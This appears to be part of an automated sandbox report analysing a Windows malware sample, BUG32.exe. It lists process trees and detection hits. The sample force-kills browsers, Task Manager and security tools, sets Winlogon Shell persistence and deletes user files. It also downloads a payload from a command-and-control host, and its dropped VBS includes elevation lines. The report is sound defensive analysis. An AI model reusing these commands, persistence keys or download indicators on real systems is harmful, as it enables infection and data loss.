        • taskkill.exe (PID: 7884 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2252 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 6204 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\BUG32\Kill.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 2616 cmdline: taskkill /f /im chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4808 cmdline: taskkill /f /im opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
          • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 4748 cmdline: taskkill /f /im iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 3160 cmdline: taskkill /f /im msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 3308 cmdline: taskkill /f /im microsoftedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 5760 cmdline: taskkill /f /im notepad.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7504 cmdline: taskkill /f /im firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 1164 cmdline: taskkill /f /im mspaint.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 7136 cmdline: taskkill /f /im skype.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 4796 cmdline: taskkill /f /im bing.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 516 cmdline: taskkill /f /im eset.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2504 cmdline: taskkill /f /im edge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2656 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • taskkill.exe (PID: 2108 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • conhost.exe (PID: 2824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: aJEWGt.exe PID: 6164JoeSecurity_BdaejecYara detected BdaejecJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\BUG32.exe", ParentImage: C:\Users\user\Desktop\BUG32.exe, ParentProcessId: 3160, ParentProcessName: BUG32.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , ProcessId: 5020, ProcessName: wscript.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\BUG32.exe", ParentImage: C:\Users\user\Desktop\BUG32.exe, ParentProcessId: 3160, ParentProcessName: BUG32.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , ProcessId: 5020, ProcessName: wscript.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\BUG32.exe", ParentImage: C:\Users\user\Desktop\BUG32.exe, ParentProcessId: 3160, ParentProcessName: BUG32.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , ProcessId: 5020, ProcessName: wscript.exe
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, wscript.exe "C:\bug32\runner.vbs", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 6532, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
    Source: Registry Key setAuthor: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ): Data: Details: C:\bug32\whitescr.png, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 6532, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\wallpaper
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Music\*.*" "*.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8104, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 5152, ProcessName: svchost.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , CommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\BUG32.exe", ParentImage: C:\Users\user\Desktop\BUG32.exe, ParentProcessId: 3160, ParentProcessName: BUG32.exe, ProcessCommandLine: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs , ProcessId: 5020, ProcessName: wscript.exe
    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c dir "C:\Users\user\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk", CommandLine: "C:\Windows\System32\cmd.exe" /c dir "C:\Users\user\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6532, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c dir "C:\Users\user\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk", ProcessId: 4284, ProcessName: cmd.exe
    No Snort rule has matched
    Timestamp:2024-07-26T02:34:53.677362+0200
    SID:2022930
    Source Port:443
    Destination Port:49712
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-07-26T02:34:34.160951+0200
    SID:2838522
    Source Port:50817
    Destination Port:53
    Protocol:UDP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-26T02:34:37.851976+0200
    SID:2807908
    Source Port:49704
    Destination Port:799
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-26T02:34:35.176118+0200
    SID:2838522
    Source Port:50817
    Destination Port:53
    Protocol:UDP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-26T02:35:34.422089+0200
    SID:2022930
    Source Port:443
    Destination Port:49731
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-07-26T02:34:33.154123+0200
    SID:2838522
    Source Port:50817
    Destination Port:53
    Protocol:UDP
    Classtype:Malware Command and Control Activity Detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: BUG32.exeAvira: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: ddos.dnsnb8.netVirustotal: Detection: 12%Perma Link
    Source: C:\BUG32\ad.exeReversingLabs: Detection: 35%
    Source: C:\BUG32\ad.exeVirustotal: Detection: 49%Perma Link
    Source: C:\BUG32\jsc.exeReversingLabs: Detection: 46%
    Source: C:\BUG32\jsc.exeVirustotal: Detection: 65%Perma Link
    Source: C:\Users\user\AppData\Local\.curlrcReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\.curlrcVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\.exeVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.exeVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.logReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.logVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENTReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENTVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.exeVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0ReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0Virustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.exeVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1ReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1Virustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.exeVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.exeVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.exeVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.exeVirustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0ReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0Virustotal: Detection: 49%Perma Link
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.exeVirustotal: Detection: 49%Perma Link
    Source: BUG32.exeVirustotal: Detection: 87%Perma Link
    Source: BUG32.exeReversingLabs: Detection: 95%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: BUG32.exeJoe Sandbox ML: detected
    Source: BUG32.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Binary string: C:\Users\Guest\documents\visual studio 2015\Projects\Noways\Noways\obj\Debug\Noways.pdb source: BUG32.exe, 00000000.00000003.2028575508.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, BUG32.exe, 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmp
    Source: Binary string: c:\users\guest\documents\visual studio 2015\Projects\msaccessdenied\msaccessdenied\obj\Debug\msaccessdenied.pdb source: BUG32.exe, 00000000.00000003.2026291126.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, BUG32.exe, 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmp, wscript.exe, 00000005.00000002.3899135257.00000276014AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2745897034.000002760147E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.3703614504.00000276014AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2745943282.0000027601469000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.3709577680.00000276014AB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: c:\users\guest\documents\visual studio 2015\Projects\msaccessdenied\msaccessdenied\obj\Debug\msaccessdenied.pdb,hFh 8h_CorExeMainmscoree.dll source: BUG32.exe, 00000000.00000003.2026291126.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, BUG32.exe, 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmp, wscript.exe, 00000005.00000002.3899135257.00000276014AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2745897034.000002760147E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.3703614504.00000276014AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2745943282.0000027601469000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.3709577680.00000276014AB000.00000004.00000020.00020000.00000000.sdmp

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: z:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: x:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: v:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: t:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: r:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: p:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: n:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: l:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: j:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: h:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: f:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: b:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: y:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: w:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: u:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: s:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: q:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: o:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: m:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: k:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: i:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: g:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: e:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: c:
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: a:
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00AE29E2
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00AE2B8C
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
    Source: global trafficTCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_00AE1099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: aJEWGt.exe, 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmp, aJEWGt.exe, 00000001.00000003.2025242800.0000000000FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: aJEWGt.exe, 00000001.00000003.2074977882.000000000159A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
    Source: aJEWGt.exe, 00000001.00000003.2074977882.000000000159A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: aJEWGt.exe, 00000001.00000003.2074977882.000000000159A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar1
    Source: aJEWGt.exe, 00000001.00000003.2074977882.000000000159A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
    Source: aJEWGt.exe, 00000001.00000002.2637496286.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarHQX
    Source: aJEWGt.exe, 00000001.00000002.2637496286.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarLQX
    Source: aJEWGt.exe, 00000001.00000002.2637496286.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarMQX
    Source: aJEWGt.exe, 00000001.00000002.2637496286.000000000154A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarhQY
    Source: aJEWGt.exe, 00000001.00000002.2639403569.00000000030BA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
    Source: aJEWGt.exe, 00000001.00000002.2637496286.000000000154A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarqn
    Source: aJEWGt.exe, 00000001.00000002.2637496286.0000000001592000.00000004.00000020.00020000.00000000.sdmp, aJEWGt.exe, 00000001.00000003.2074977882.000000000159A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_004096C1 GetFocus,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetClassNameA,strncmp,SendMessageA,GetKeyState,GetKeyState,GetKeyState,GetPropA,GetPropA,GetPropA,GetWindowThreadProcessId,GetCurrentProcessId,0_2_004096C1

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: C:\Windows\System32\wscript.exeFile deleted: C:\Users\user\Desktop\BJZFPPWAPT.pdfJump to behavior
    Source: C:\Windows\System32\wscript.exeFile deleted: C:\Users\user\Desktop\EIVQSAOTAQ.jpgJump to behavior
    Source: C:\Windows\System32\wscript.exeFile deleted: C:\Users\user\Desktop\PALRGUCVEH.xlsxJump to behavior
    Source: C:\Windows\System32\wscript.exeFile deleted: C:\Users\user\Desktop\DUUDTUBZFW.pngJump to behavior
    Source: C:\Windows\System32\wscript.exeFile deleted: C:\Users\user\Desktop\EOWRVPQCCS.xlsxJump to behavior
    Source: conhost.exeProcess created: 576
    Source: cmd.exeProcess created: 671

    System Summary

    barindex
    Source: BUG32.exeStatic PE information: section name: )Gu
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: C:\Users\user\Desktop\BUG32.exeDropped file: ObjShell.ShellExecute "wscript.exe", """" & buhu & """ RunAsAdministrator", , "runas", 1 Jump to dropped file
    Source: C:\Users\user\Desktop\BUG32.exeDropped file: objshell.shellexecute"C:\BUG32\Kill.bat",,,"runas",0 Jump to dropped file
    Source: C:\Users\user\Desktop\BUG32.exeDropped file: ObjShell.ShellExecute "wscript.exe", """" & buhu & """ RunAsAdministrator", , "runas", 1 Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped file: ObjShell.ShellExecute "wscript.exe", """" & buhu & """ RunAsAdministrator", , "runas", 1 Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped file: objshell.shellexecute"C:\BUG32\Kill.bat",,,"runas",0 Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped file: ObjShell.ShellExecute "wscript.exe", """" & buhu & """ RunAsAdministrator", , "runas", 1 Jump to dropped file
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_0040B7A00_2_0040B7A0
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00408E650_2_00408E65
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_0040BAD00_2_0040BAD0
